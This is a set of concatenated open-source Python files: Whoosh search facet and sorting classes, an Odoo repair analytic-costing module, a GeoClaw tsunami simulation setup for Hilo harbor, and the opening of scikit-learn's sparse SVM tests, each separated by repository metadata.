        # Strings are treated as field names; FacetType objects are added
        # directly; anything else is an error
        if isinstance(item, FacetType):
            self.add_facet(item)
        elif isinstance(item, string_type):
            self.add_field(item)
        else:
            raise Exception("Don't know what to do with facet %r" % (item,))

    def add_field(self, fieldname, reverse=False):
        self.facets.append(FieldFacet(fieldname, reverse=reverse))
        return self

    def add_query(self, querydict, other=None, allow_overlap=False):
        self.facets.append(QueryFacet(querydict, other=other,
                                      allow_overlap=allow_overlap))
        return self

    def add_score(self):
        self.facets.append(ScoreFacet())
        return self

    def add_facet(self, facet):
        if not isinstance(facet, FacetType):
            raise TypeError("%r is not a facet object, perhaps you meant "
                            "add_field()" % (facet,))
        self.facets.append(facet)
        return self

    def categorizer(self, global_searcher):
        if not self.facets:
            raise Exception("No facets")
        elif len(self.facets) == 1:
            # Single sub-facet: no need for the tuple-key wrapper
            catter = self.facets[0].categorizer(global_searcher)
        else:
            catter = self.MultiCategorizer([facet.categorizer(global_searcher)
                                            for facet in self.facets])
        return catter

    class MultiCategorizer(Categorizer):
        def __init__(self, catters):
            self.catters = catters

        @property
        def needs_current(self):
            # The combination needs the current matcher if ANY sub-facet does
            return any(c.needs_current for c in self.catters)

        def set_searcher(self, segment_searcher, docoffset):
            for catter in self.catters:
                catter.set_searcher(segment_searcher, docoffset)

        def key_for(self, matcher, docid):
            # Tuple of sub-keys sorts lexicographically: first facet is the
            # primary sort key, later facets break ties
            return tuple(catter.key_for(matcher, docid)
                         for catter in self.catters)

        def key_to_name(self, key):
            return tuple(catter.key_to_name(keypart)
                         for catter, keypart
                         in izip(self.catters, key))
class Facets(object):
    """Maps facet names to :class:`FacetType` objects, for creating multiple
    groupings of documents.

    For example, to group by tag, and **also** group by price range::

        facets = Facets()
        facets.add_field("tag")
        facets.add_facet("price", RangeFacet("price", 0, 1000, 100))
        results = searcher.search(myquery, groupedby=facets)

        tag_groups = results.groups("tag")
        price_groups = results.groups("price")

    (To group by the combination of multiple facets, use :class:`MultiFacet`.)
    """

    def __init__(self, x=None):
        """
        :param x: an optional ``Facets`` object or dict to copy facets from.
        """
        self.facets = {}
        if x:
            self.add_facets(x)

    @classmethod
    def from_groupedby(cls, groupedby):
        """Build a Facets object from the many forms accepted by the
        ``groupedby`` search keyword: a Facets/dict, a field name string, a
        FacetType, or a list/tuple of any of these.
        """
        facets = cls()
        if isinstance(groupedby, (cls, dict)):
            facets.add_facets(groupedby)
        elif isinstance(groupedby, string_type):
            facets.add_field(groupedby)
        elif isinstance(groupedby, FacetType):
            facets.add_facet(groupedby.default_name(), groupedby)
        elif isinstance(groupedby, (list, tuple)):
            for item in groupedby:
                # Recurse on each item and merge the resulting facets
                facets.add_facets(cls.from_groupedby(item))
        else:
            raise Exception("Don't know what to do with groupedby=%r"
                            % groupedby)

        return facets

    def names(self):
        """Returns an iterator of the facet names in this object.
        """
        return iter(self.facets)

    def items(self):
        """Returns a list of (facetname, facetobject) tuples for the facets in
        this object.
        """
        return self.facets.items()

    def add_field(self, fieldname, **kwargs):
        """Adds a :class:`FieldFacet` for the given field name (the field name
        is automatically used as the facet name).
        """
        self.facets[fieldname] = FieldFacet(fieldname, **kwargs)
        return self

    def add_query(self, name, querydict, **kwargs):
        """Adds a :class:`QueryFacet` under the given ``name``.

        :param name: a name for the facet.
        :param querydict: a dictionary mapping keys to
            :class:`whoosh.query.Query` objects.
        """
        self.facets[name] = QueryFacet(querydict, **kwargs)
        return self

    def add_facet(self, name, facet):
        """Adds a :class:`FacetType` object under the given ``name``.
        """
        if not isinstance(facet, FacetType):
            raise Exception("%r:%r is not a facet" % (name, facet))
        self.facets[name] = facet
        return self

    def add_facets(self, facets, replace=True):
        """Adds the contents of the given ``Facets`` or ``dict`` object to this
        object.

        :param replace: if True (the default), incoming facets overwrite
            same-named facets already present.
        """
        if not isinstance(facets, (dict, Facets)):
            raise Exception("%r is not a Facets object or dict" % facets)
        for name, facet in facets.items():
            if replace or name not in self.facets:
                self.facets[name] = facet
        return self
# Objects for holding facet groups
class FacetMap(object):
    """Base class for objects holding the results of grouping search results by
    a Facet. Use an object's ``as_dict()`` method to access the results.

    You can pass a subclass of this to the ``maptype`` keyword argument when
    creating a ``FacetType`` object to specify what information the facet
    should record about the group. For example::

        # Record each document in each group in its sorted order
        myfacet = FieldFacet("size", maptype=OrderedList)

        # Record only the count of documents in each group
        myfacet = FieldFacet("size", maptype=Count)

    Subclasses must implement both ``add()`` and ``as_dict()``.
    """

    def add(self, groupname, docid, sortkey):
        """Adds a document to the facet results.

        :param groupname: the name of the group to add this document to.
        :param docid: the document number of the document to add.
        :param sortkey: a value representing the sort position of the document
            in the full results.
        """
        raise NotImplementedError

    def as_dict(self):
        """Returns a dictionary object mapping group names to
        implementation-specific values. For example, the value might be a list
        of document numbers, or a integer representing the number of documents
        in the group.
        """
        raise NotImplementedError
class OrderedList(FacetMap):
    """Stores a list of document numbers for each group, in the same order as
    they appear in the search results.

    The ``as_dict`` method returns a dictionary mapping group names to lists
    of document numbers.
    """

    def __init__(self):
        # Maps group name -> list of (sortkey, docid) pairs
        self.dict = defaultdict(list)

    def __repr__(self):
        return "<%s %r>" % (self.__class__.__name__, self.dict)

    def add(self, groupname, docid, sortkey):
        # Keep the sort key so as_dict() can order docids by result position
        entry = (sortkey, docid)
        self.dict[groupname].append(entry)

    def as_dict(self):
        # Sort each group's (sortkey, docid) pairs and strip the keys
        return dict((name, [docnum for _, docnum in sorted(pairs)])
                    for name, pairs in iteritems(self.dict))
class UnorderedList(FacetMap):
    """Stores a list of document numbers for each group, in arbitrary order.
    This is slightly faster and uses less memory than :class:`OrderedList`
    if you don't care about the ordering of the documents within groups.

    The ``as_dict`` method returns a dictionary mapping group names to lists
    of document numbers.
    """

    def __init__(self):
        # Maps group name -> list of docids, in insertion order only
        self.dict = defaultdict(list)

    def __repr__(self):
        return "<%s %r>" % (self.__class__.__name__, self.dict)

    def add(self, groupname, docid, sortkey):
        # The sort key is ignored; only group membership is recorded
        self.dict[groupname].append(docid)

    def as_dict(self):
        # Copy into a plain dict so missing keys no longer auto-create
        return dict(self.dict)
class Count(FacetMap):
    """Stores the number of documents in each group.

    The ``as_dict`` method returns a dictionary mapping group names to
    integers.
    """

    def __init__(self):
        # Maps group name -> number of documents seen so far
        self.dict = defaultdict(int)

    def __repr__(self):
        return "<%s %r>" % (self.__class__.__name__, self.dict)

    def add(self, groupname, docid, sortkey):
        # Only the tally matters; docid and sortkey are discarded
        self.dict[groupname] = self.dict[groupname] + 1

    def as_dict(self):
        return dict(self.dict)
class Best(FacetMap):
    """Stores the "best" document in each group (that is, the one with the
    highest sort key).

    NOTE(review): the code keeps the document with the *lowest* ``sortkey``
    value; this is the first-sorted ("best") document when sort keys are
    constructed so smaller keys sort first (e.g. negated scores) -- confirm
    against the categorizers.

    The ``as_dict`` method returns a dictionary mapping group names to
    document numbers.
    """

    def __init__(self):
        # bestids: group name -> docid of the current best document
        self.bestids = {}
        # bestkeys: group name -> sort key of that document
        self.bestkeys = {}

    def __repr__(self):
        return "<%s %r>" % (self.__class__.__name__, self.bestids)

    def add(self, groupname, docid, sortkey):
        # Keep the document with the smallest sort key seen for this group
        if groupname not in self.bestids or sortkey < self.bestkeys[groupname]:
            self.bestids[groupname] = docid
            self.bestkeys[groupname] = sortkey

    def as_dict(self):
        return self.bestids
# Helper functions
def add_sortable(writer, fieldname, facet, column=None):
    """Adds a per-document value column to an existing field which was created
    without the ``sortable`` keyword argument.

    >>> from whoosh import index, sorting
    >>> ix = index.open_dir("indexdir")
    >>> with ix.writer() as w:
    ...   facet = sorting.FieldFacet("price")
    ...   sorting.add_sortable(w, "price", facet)
    ...

    :param writer: a :class:`whoosh.writing.IndexWriter` object.
    :param fieldname: the name of the field to add the per-document sortable
        values to. If this field doesn't exist in the writer's schema, the
        function will add a :class:`whoosh.fields.COLUMN` field to the schema,
        and you must specify the column object to using the ``column`` keyword
        argument.
    :param facet: a :class:`FacetType` object to use to generate the
        per-document values.
    :param column: a :class:`whoosh.columns.ColumnType` object to use to store
        the per-document values. If you don't specify a column object, the
        function will use the default column type for the given field.
    """
    storage = writer.storage
    schema = writer.schema

    field = None
    if fieldname in schema:
        field = schema[fieldname]
        if field.column_type:
            raise Exception("%r field is already sortable" % fieldname)

    if column:
        if fieldname not in schema:
            # Add a column-only field to the schema to hold the values
            from whoosh.fields import COLUMN

            field = COLUMN(column)
            schema.add(fieldname, field)
    else:
        if fieldname in schema:
            # No explicit column given: use the field's default column type
            column = field.default_column()
        else:
            raise Exception("Field %r does not exist" % fieldname)

    searcher = writer.searcher()
    catter = facet.categorizer(searcher)
    # Write one column file per segment, filled with each document's
    # facet value
    for subsearcher, docoffset in searcher.leaf_searchers():
        catter.set_searcher(subsearcher, docoffset)
        reader = subsearcher.reader()

        if reader.has_column(fieldname):
            raise Exception("%r field already has a column" % fieldname)

        codec = reader.codec()
        segment = reader.segment()

        colname = codec.column_filename(segment, fieldname)
        colfile = storage.create_file(colname)
        try:
            colwriter = column.writer(colfile)
            for docnum in reader.all_doc_ids():
                # key_for(None, ...): the matcher argument is unused here --
                # presumably safe for non-score facets; TODO confirm for
                # facets whose categorizer needs the current matcher
                v = catter.key_to_name(catter.key_for(None, docnum))
                cv = field.to_column_value(v)
                colwriter.add(docnum, cv)
            colwriter.finish(reader.doc_count_all())
        finally:
            # Ensure the column file is closed even if writing fails
            colfile.close()

    # Record the column type so the field is treated as sortable from now on
    field.column_type = column
| bsd-3-clause |
factorlibre/odoomrp-wip | mrp_repair_analytic/models/mrp_repair.py | 6 | 5544 | # -*- coding: utf-8 -*-
# © 2015 Ainara Galdona - AvanzOSC
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
from openerp import models, fields, api, exceptions, _
from openerp.addons import decimal_precision as dp
class MrpRepair(models.Model):
    _inherit = 'mrp.repair'

    # Analytic account to post repair costs / invoice lines against.
    # 'view'-type accounts cannot hold postings, hence the domain.
    analytic_account = fields.Many2one(
        'account.analytic.account', domain=[('type', '!=', 'view')],
        string='Analytic Account')

    @api.multi
    def create_repair_cost(self):
        """(Re)create the analytic cost lines for each repair.

        Previously generated repair-cost lines on the repair's analytic
        account are removed first (making the method idempotent), then one
        analytic line is created per fee line and per 'add'-type operation
        line flagged with ``load_cost``.
        """
        analytic_line_obj = self.env['account.analytic.line']
        for record in self:
            if not record.analytic_account:
                continue
            # Drop this repair's existing non-zero cost lines so re-running
            # does not duplicate them
            lines = record.analytic_account.line_ids.filtered(
                lambda x: x.is_repair_cost and x.amount != 0 and
                x.repair_id.id == record.id)
            lines.unlink()
            for line in record.fees_lines.filtered('load_cost'):
                vals = record._catch_repair_line_information_for_analytic(line)
                if vals:
                    analytic_line_obj.create(vals)
            for line in record.operations.filtered(
                    lambda x: x.load_cost and x.type == 'add'):
                vals = record._catch_repair_line_information_for_analytic(line)
                if vals:
                    analytic_line_obj.create(vals)

    @api.model
    def action_repair_end(self):
        """Generate the analytic cost lines when the repair ends."""
        # NOTE(review): @api.model on an action method that then calls
        # self.create_repair_cost() looks inconsistent -- confirm the
        # decorator matches the base method's API.
        result = super(MrpRepair, self).action_repair_end()
        self.create_repair_cost()
        return result

    def _catch_repair_line_information_for_analytic(self, line):
        """Build the analytic-line values dict from a repair fee/operation
        line.

        Returns False when the line's cost subtotal is zero (nothing to
        post). Raises a Warning if the repair analytic journal is missing.
        """
        analytic_line_obj = self.env['account.analytic.line']
        journal = self.env.ref('mrp.analytic_journal_repair', False)
        if not journal:
            raise exceptions.Warning(_('Error!: Repair journal not found'))
        name = self.name
        if line.product_id.default_code:
            name += ' - ' + line.product_id.default_code
        categ_id = line.product_id.categ_id
        # Fall back to the product category's income account when the
        # product defines none of its own
        general_account = (line.product_id.property_account_income or
                           categ_id.property_account_income_categ or False)
        # Costs are stored as negative amounts on the analytic account
        amount = line.cost_subtotal * -1
        if not amount:
            return False
        vals = {'name': name,
                'user_id': line.user_id.id,
                'date': analytic_line_obj._get_default_date(),
                'product_id': line.product_id.id,
                'unit_amount': line.product_uom_qty,
                'product_uom_id': line.product_uom.id,
                'amount': amount,
                'journal_id': journal.id,
                'account_id': self.analytic_account.id,
                'is_repair_cost': True,
                'general_account_id': general_account.id,
                'repair_id': line.repair_id.id,
                }
        return vals

    @api.multi
    def action_invoice_create(self, group=False):
        """Propagate the repair's analytic account to the invoice lines
        created for its fees and operations.
        """
        res = super(MrpRepair, self).action_invoice_create(group=group)
        for record in self.filtered('analytic_account'):
            record.mapped('fees_lines.invoice_line_id').write(
                {'account_analytic_id': record.analytic_account.id})
            record.mapped('operations.invoice_line_id').write(
                {'account_analytic_id': record.analytic_account.id})
        return res
class MrpRepairLine(models.Model):
    _inherit = 'mrp.repair.line'

    @api.multi
    @api.depends('product_id', 'product_uom_qty', 'lot_id')
    def _compute_cost_subtotal(self):
        """Compute the unit cost and cost subtotal of the repair line.

        For products costed with the 'real' method and a selected lot, the
        cost is taken from the first internal-location quant of that lot;
        otherwise the product's standard price is used.
        """
        for line in self:
            std_price = 0
            if line.product_id.cost_method == 'real' and line.lot_id:
                quants = line.lot_id.quant_ids.filtered(
                    lambda x: x.location_id.usage == 'internal')
                if quants:
                    # Use the cost of the first matching quant.
                    # NOTE(review): if no internal quants exist the cost
                    # stays 0 (no fallback to standard_price) -- confirm
                    # this is intended.
                    std_price = quants[:1].cost
            else:
                std_price = line.product_id.standard_price
            line.standard_price = std_price
            line.cost_subtotal = std_price * line.product_uom_qty

    # Computed AND stored so the cost is frozen when product/qty/lot change,
    # not recomputed when the product's price later changes
    standard_price = fields.Float(
        string='Cost Price', digits=dp.get_precision('Account'),
        compute='_compute_cost_subtotal', store=True)
    cost_subtotal = fields.Float(
        string='Cost Subtotal', digits=dp.get_precision('Account'),
        compute='_compute_cost_subtotal', store=True)
    # User the generated analytic cost line is attributed to
    user_id = fields.Many2one('res.users', string='User', required=True,
                              default=lambda self: self.env.user)
    # Whether this line should generate an analytic cost line
    load_cost = fields.Boolean(string='Load Cost', default=True)
class MrpRepairFee(models.Model):
    _inherit = 'mrp.repair.fee'

    @api.multi
    @api.depends('product_id', 'product_uom_qty')
    def _compute_cost_subtotal(self):
        """Compute the unit cost and cost subtotal of the fee line from the
        product's standard price and the quantity.
        """
        for fee in self:
            fee.standard_price = fee.product_id.standard_price
            fee.cost_subtotal = (fee.product_id.standard_price *
                                 fee.product_uom_qty)

    # User the generated analytic cost line is attributed to
    user_id = fields.Many2one('res.users', string='User', required=True,
                              default=lambda self: self.env.user)
    # Whether this fee should generate an analytic cost line
    load_cost = fields.Boolean(string='Load Cost', default=True)
    # Computed field and not related. Because only has to be reloaded when a
    # product or quantity is changed but not if products price is changed
    standard_price = fields.Float(
        string='Cost Price', digits=dp.get_precision('Account'),
        compute='_compute_cost_subtotal', store=True)
    cost_subtotal = fields.Float(
        string='Cost Subtotal', digits=dp.get_precision('Account'),
        compute='_compute_cost_subtotal', store=True)
| agpl-3.0 |
rjleveque/tsunami_benchmarks | nthmp_currents_2015/problem2/harbor1/setrun.py | 2 | 14360 | """
Module to set up run time parameters for Clawpack -- AMRClaw code.
The values set in the function setrun are then written out to data files
that will be read in by the Fortran code.
"""
import os
import numpy as np
#------------------------------
def setrun(claw_pkg='geoclaw'):
#------------------------------
    """
    Define the parameters used for running Clawpack.
    INPUT:
        claw_pkg expected to be "geoclaw" for this setrun.
    OUTPUT:
        rundata - object of class ClawRunData
    """
    from clawpack.clawutil import data
    assert claw_pkg.lower() == 'geoclaw', "Expected claw_pkg = 'geoclaw'"
    num_dim = 2
    rundata = data.ClawRunData(claw_pkg, num_dim)
    #------------------------------------------------------------------
    # Problem-specific parameters to be written to setprob.data:
    #------------------------------------------------------------------
    #probdata = rundata.new_UserData(name='probdata',fname='setprob.data')
    #------------------------------------------------------------------
    # GeoClaw specific parameters:
    #------------------------------------------------------------------
    rundata = setgeo(rundata)
    #------------------------------------------------------------------
    # Standard Clawpack parameters to be written to claw.data:
    #------------------------------------------------------------------
    clawdata = rundata.clawdata # initialized when rundata instantiated
    # Set single grid parameters first.
    # See below for AMR parameters.
    # ---------------
    # Spatial domain:
    # ---------------
    # Number of space dimensions:
    clawdata.num_dim = num_dim
    # Lower and upper edge of computational domain
    # (longitude/latitude degrees near Hilo, Hawaii):
    clawdata.lower[0] = 204.905 # xlower
    clawdata.upper[0] = 204.965 # xupper
    clawdata.lower[1] = 19.71 # ylower
    clawdata.upper[1] = 19.758 # yupper
    # Number of grid cells:
    clawdata.num_cells[0] = 108 # 2-sec # mx
    clawdata.num_cells[1] = 88 # my
    # ---------------
    # Size of system:
    # ---------------
    # Number of equations in the system:
    clawdata.num_eqn = 3
    # Number of auxiliary variables in the aux array (initialized in setaux)
    clawdata.num_aux = 3
    # Index of aux array corresponding to capacity function, if there is one:
    clawdata.capa_index = 2
    # -------------
    # Initial time:
    # -------------
    clawdata.t0 = 0.0
    # Restart from checkpoint file of a previous run?
    # Note: If restarting, you must also change the Makefile to set:
    # RESTART = True
    # If restarting, t0 above should be from original run, and the
    # restart_file 'fort.chkNNNNN' specified below should be in
    # the OUTDIR indicated in Makefile.
    clawdata.restart = False # True to restart from prior results
    clawdata.restart_file = 'fort.chk00006' # File to use for restart data
    # -------------
    # Output times:
    #--------------
    # Specify at what times the results should be written to fort.q files.
    # Note that the time integration stops after the final output time.
    clawdata.output_style = 1
    if clawdata.output_style==1:
        # Output ntimes frames at equally spaced times up to tfinal:
        # Can specify num_output_times = 0 for no output
        clawdata.num_output_times = 14
        clawdata.tfinal = 7*3600.
        clawdata.output_t0 = True # output at initial (or restart) time?
    elif clawdata.output_style == 2:
        # Specify a list or numpy array of output times:
        # Include t0 if you want output at the initial time.
        clawdata.output_times = 3600. * np.linspace(1,4,97)
    elif clawdata.output_style == 3:
        # Output every step_interval timesteps over total_steps timesteps:
        clawdata.output_step_interval = 1
        clawdata.total_steps = 10
        clawdata.output_t0 = False # output at initial (or restart) time?
    clawdata.output_format = 'binary' # 'ascii', 'binary', 'netcdf'
    clawdata.output_q_components = 'all' # could be list such as [True,True]
    clawdata.output_aux_components = 'none' # could be list
    clawdata.output_aux_onlyonce = True # output aux arrays only at t0
    # ---------------------------------------------------
    # Verbosity of messages to screen during integration:
    # ---------------------------------------------------
    # The current t, dt, and cfl will be printed every time step
    # at AMR levels <= verbosity. Set verbosity = 0 for no printing.
    # (E.g. verbosity == 2 means print only on levels 1 and 2.)
    clawdata.verbosity = 0
    # --------------
    # Time stepping:
    # --------------
    # if dt_variable==True: variable time steps used based on cfl_desired,
    # if dt_variable==False: fixed time steps dt = dt_initial always used.
    clawdata.dt_variable = True
    # Initial time step for variable dt.
    # (If dt_variable==0 then dt=dt_initial for all steps)
    clawdata.dt_initial = 0.016
    # Max time step to be allowed if variable dt used:
    clawdata.dt_max = 1e+99
    # Desired Courant number if variable dt used
    clawdata.cfl_desired = 0.75
    # max Courant number to allow without retaking step with a smaller dt:
    clawdata.cfl_max = 1.0
    # Maximum number of time steps to allow between output times:
    clawdata.steps_max = 50000
    # ------------------
    # Method to be used:
    # ------------------
    # Order of accuracy: 1 => Godunov, 2 => Lax-Wendroff plus limiters
    clawdata.order = 2
    # Use dimensional splitting? (not yet available for AMR)
    clawdata.dimensional_split = 'unsplit'
    # For unsplit method, transverse_waves can be
    # 0 or 'none' ==> donor cell (only normal solver used)
    # 1 or 'increment' ==> corner transport of waves
    # 2 or 'all' ==> corner transport of 2nd order corrections too
    clawdata.transverse_waves = 2
    # Number of waves in the Riemann solution:
    clawdata.num_waves = 3
    # List of limiters to use for each wave family:
    # Required: len(limiter) == num_waves
    # Some options:
    # 0 or 'none' ==> no limiter (Lax-Wendroff)
    # 1 or 'minmod' ==> minmod
    # 2 or 'superbee' ==> superbee
    # 3 or 'vanleer' ==> van Leer
    # 4 or 'mc' ==> MC limiter
    clawdata.limiter = ['vanleer', 'vanleer', 'vanleer']
    clawdata.use_fwaves = True # True ==> use f-wave version of algorithms
    # Source terms splitting:
    # src_split == 0 or 'none' ==> no source term (src routine never called)
    # src_split == 1 or 'godunov' ==> Godunov (1st order) splitting used,
    # src_split == 2 or 'strang' ==> Strang (2nd order) splitting used, not recommended.
    clawdata.source_split = 1
    # --------------------
    # Boundary conditions:
    # --------------------
    # Number of ghost cells (usually 2)
    clawdata.num_ghost = 2
    # Choice of BCs at xlower and xupper:
    # 0 or 'user' => user specified (must modify bcNamr.f to use this option)
    # 1 or 'extrap' => extrapolation (non-reflecting outflow)
    # 2 or 'periodic' => periodic (must specify this at both boundaries)
    # 3 or 'wall' => solid wall for systems where q(2) is normal velocity
    clawdata.bc_lower[0] = 'extrap' # at xlower
    clawdata.bc_upper[0] = 'extrap' # at xupper
    clawdata.bc_lower[1] = 'extrap' # at ylower
    clawdata.bc_upper[1] = 'user' # at yupper
    # ---------------
    # Gauges:
    # ---------------
    gauges = rundata.gaugedata.gauges
    # for gauges append lines of the form [gaugeno, x, y, t1, t2]
    gauges.append([1125, 204.91802, 19.74517, 0., 1.e9]) #Hilo
    gauges.append([1126, 204.93003, 19.74167, 0., 1.e9]) #Hilo
    # gauges.append([11261, 204.93003, 19.739, 0., 1.e9])
    # #Hilo
    # Tide gauge:
    gauges.append([7760, 204.9437, 19.7306, 0., 1.e9]) # Hilo
    gauges.append([7761, 204.9447, 19.7308, 0., 1.e9]) # From Benchmark descr.
    gauges.append([7762, 204.9437, 19.7307, 0., 1.e9]) # Shift so depth > 0
    # Gauge at point requested by Pat Lynett:
    gauges.append([3333, 204.93, 19.7576, 0., 1.e9])
    if 0:
        # Disabled diagnostic block (kept for reference):
        # Array of synthetic gauges originally used to find S2 location:
        dx = .0005
        for i in range(6):
            x = 204.93003 - i*dx
            for j in range(5):
                y = 19.74167 + (j-2)*dx
                gauges.append([10*(j+1)+i+1, x, y, 0., 1.e9])
    # --------------
    # Checkpointing:
    # --------------
    # Specify when checkpoint files should be created that can be
    # used to restart a computation.
    clawdata.checkpt_style = 0
    if clawdata.checkpt_style == 0:
        # Do not checkpoint at all
        pass
    elif clawdata.checkpt_style == 1:
        # Checkpoint only at tfinal.
        pass
    elif clawdata.checkpt_style == 2:
        # Specify a list of checkpoint times.
        clawdata.checkpt_times = np.array([7.5,8,8.5,9,9.5]) * 3600.
    elif clawdata.checkpt_style == 3:
        # Checkpoint every checkpt_interval timesteps (on Level 1)
        # and at the final time.
        clawdata.checkpt_interval = 5
    # ---------------
    # AMR parameters: (written to amr.data)
    # ---------------
    amrdata = rundata.amrdata
    # max number of refinement levels:
    amrdata.amr_levels_max = 3
    # List of refinement ratios at each level (length at least amr_level_max-1)
    amrdata.refinement_ratios_x = [2,3]
    amrdata.refinement_ratios_y = [2,3]
    amrdata.refinement_ratios_t = [2,3]
    # Specify type of each aux variable in amrdata.auxtype.
    # This must be a list of length num_aux, each element of which is one of:
    # 'center', 'capacity', 'xleft', or 'yleft' (see documentation).
    amrdata.aux_type = ['center', 'capacity', 'yleft']
    # Flag for refinement based on Richardson error estimator:
    amrdata.flag_richardson = False # use Richardson?
    amrdata.flag_richardson_tol = 1.0 # Richardson tolerance
    # Flag for refinement using routine flag2refine:
    amrdata.flag2refine = True # use this?
    amrdata.flag2refine_tol = 0.5 # tolerance used in this routine
    # Note: in geoclaw the refinement tolerance is set as wave_tolerance below
    # and flag2refine_tol is unused!
    # steps to take on each level L between regriddings of level L+1:
    amrdata.regrid_interval = 3
    # width of buffer zone around flagged points:
    # (typically the same as regrid_interval so waves don't escape):
    amrdata.regrid_buffer_width = 2
    # clustering alg. cutoff for (# flagged pts) / (total # of cells refined)
    # (closer to 1.0 => more small grids may be needed to cover flagged cells)
    amrdata.clustering_cutoff = 0.7
    # print info about each regridding up to this level:
    amrdata.verbosity_regrid = 0
    # ---------------
    # Regions:
    # ---------------
    regions = rundata.regiondata.regions
    # Each entry is presumably [minlevel, maxlevel, t1, t2, x1, x2, y1, y2]
    # (standard GeoClaw region format) -- TODO confirm against regiondata docs.
    regions.append([1, 1, 0., 1e9, 0, 360, -90, 90])
    regions.append([1, 2, 0., 1e9, 204.9, 204.95, 19.7, 19.754])
    regions.append([1, 3, 0., 1e9, 204.9, 204.95, 19.7, 19.751])
    regions.append([1, 4, 0., 1e9, 204.9, 204.95, 19.72, 19.748])
    # ----- For developers -----
    # Toggle debugging print statements:
    amrdata.dprint = False # print domain flags
    amrdata.eprint = False # print err est flags
    amrdata.edebug = False # even more err est flags
    amrdata.gprint = False # grid bisection/clustering
    amrdata.nprint = False # proper nesting output
    amrdata.pprint = False # proj. of tagged points
    amrdata.rprint = False # print regridding summary
    amrdata.sprint = False # space/memory output
    amrdata.tprint = False # time step reporting each level
    amrdata.uprint = False # update/upbnd reporting
    return rundata
# end of function setrun
# ----------------------
#-------------------
def setgeo(rundata):
#-------------------
    """
    Set GeoClaw specific runtime parameters.

    Fills in the geo_data, refinement_data, topo_data, qinit_data,
    fixed_grid_data and fgmax_data sub-objects of *rundata* and returns
    the same object.  Raises AttributeError if rundata has no geo_data.
    """
    try:
        geo_data = rundata.geo_data
    except AttributeError:
        # Only the missing-attribute case is expected here (the original
        # bare "except:" over-matched).  print() instead of the Python-2
        # print statement keeps this module importable under Python 3.
        print("*** Error, this rundata has no geo_data attribute")
        raise AttributeError("Missing geo_data attribute")
    # == Physics ==
    geo_data.gravity = 9.81
    geo_data.coordinate_system = 2
    geo_data.earth_radius = 6367500.0
    # == Forcing Options
    geo_data.coriolis_forcing = False
    # == Algorithm and Initial Conditions ==
    geo_data.sea_level = 0.
    geo_data.dry_tolerance = 0.001
    geo_data.friction_forcing = True
    geo_data.manning_coefficient = 0.025
    geo_data.friction_depth = 500.0
    # Refinement settings
    refinement_data = rundata.refinement_data
    refinement_data.variable_dt_refinement_ratios = True
    refinement_data.wave_tolerance = 0.02
    refinement_data.deep_depth = 200.0
    refinement_data.max_level_deep = 4
    # == settopo.data values ==
    topofiles = rundata.topo_data.topofiles
    topodir = '../'
    topofiles.append([2, 1, 1, 0.0, 1e10, topodir+'hilo_flattened.tt2'])
    topofiles.append([2, 1, 1, 0.0, 1e10, topodir+'flat.tt2'])
    # == setdtopo.data values ==
    #rundata.dtopo_data.dtopofiles = [[1, 3, 3, topodir + 'Fujii.txydz']]
    # == setqinit.data values ==
    rundata.qinit_data.qinit_type = 0
    rundata.qinit_data.qinitfiles = []
    # == fixedgrids.data values ==
    rundata.fixed_grid_data.fixedgrids = []
    fixedgrids = rundata.fixed_grid_data.fixedgrids
    # == fgmax.data values ==
    fgmax_files = rundata.fgmax_data.fgmax_files
    # for fixed grids append to this list names of any fgmax input files
    fgmax_files.append('fgmax_grid.txt')
    rundata.fgmax_data.num_fgmax_val = 2
    return rundata
# end of function setgeo
# ----------------------
if __name__ == '__main__':
    # Set up run-time parameters and write all data files.
    # Any command-line arguments are forwarded to setrun().
    import sys
    rundata = setrun(*sys.argv[1:])
    rundata.write()
    # Also write KML files for the regions and gauges via geoclaw kmltools.
    from clawpack.geoclaw import kmltools
    kmltools.regions2kml()
    kmltools.gauges2kml()
| bsd-3-clause |
simon-pepin/scikit-learn | sklearn/svm/tests/test_sparse.py | 95 | 12156 | from nose.tools import assert_raises, assert_true, assert_false
import numpy as np
from scipy import sparse
from numpy.testing import (assert_array_almost_equal, assert_array_equal,
assert_equal)
from sklearn import datasets, svm, linear_model, base
from sklearn.datasets import make_classification, load_digits, make_blobs
from sklearn.svm.tests import test_svm
from sklearn.utils import ConvergenceWarning
from sklearn.utils.extmath import safe_sparse_dot
from sklearn.utils.testing import assert_warns, assert_raise_message
# Module-level fixtures shared by the tests below.
# test sample 1: 6 points in 2-D, two linearly separable classes.
X = np.array([[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]])
X_sp = sparse.lil_matrix(X)
Y = [1, 1, 1, 2, 2, 2]
T = np.array([[-1, -1], [2, 2], [3, 2]])
true_result = [1, 2, 2]
# test sample 2: 5 points in 3-D, three classes.
X2 = np.array([[0, 0, 0], [1, 1, 1], [2, 0, 0, ],
               [0, 0, 2], [3, 3, 3]])
X2_sp = sparse.dok_matrix(X2)
Y2 = [1, 2, 2, 2, 3]
T2 = np.array([[-1, -1, -1], [1, 1, 1], [2, 2, 2]])
true_result2 = [1, 2, 3]
iris = datasets.load_iris()
# permute (deterministically, RandomState(0)) so class order is mixed
rng = np.random.RandomState(0)
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
# sparsify: the iris fixture is used as CSR throughout this module
iris.data = sparse.csr_matrix(iris.data)
def check_svm_model_equal(dense_svm, sparse_svm, X_train, y_train, X_test):
    # Helper: fit the same estimator config on dense vs sparse input and
    # assert the fitted models and their predictions agree; finally check
    # that a dense-trained model rejects sparse input at predict time.
    dense_svm.fit(X_train.toarray(), y_train)
    if sparse.isspmatrix(X_test):
        X_test_dense = X_test.toarray()
    else:
        X_test_dense = X_test
    sparse_svm.fit(X_train, y_train)
    # Sparse fit must yield sparse model attributes.
    assert_true(sparse.issparse(sparse_svm.support_vectors_))
    assert_true(sparse.issparse(sparse_svm.dual_coef_))
    assert_array_almost_equal(dense_svm.support_vectors_,
                              sparse_svm.support_vectors_.toarray())
    assert_array_almost_equal(dense_svm.dual_coef_, sparse_svm.dual_coef_.toarray())
    if dense_svm.kernel == "linear":
        # coef_ only exists for the linear kernel.
        assert_true(sparse.issparse(sparse_svm.coef_))
        assert_array_almost_equal(dense_svm.coef_, sparse_svm.coef_.toarray())
    assert_array_almost_equal(dense_svm.support_, sparse_svm.support_)
    assert_array_almost_equal(dense_svm.predict(X_test_dense), sparse_svm.predict(X_test))
    assert_array_almost_equal(dense_svm.decision_function(X_test_dense),
                              sparse_svm.decision_function(X_test))
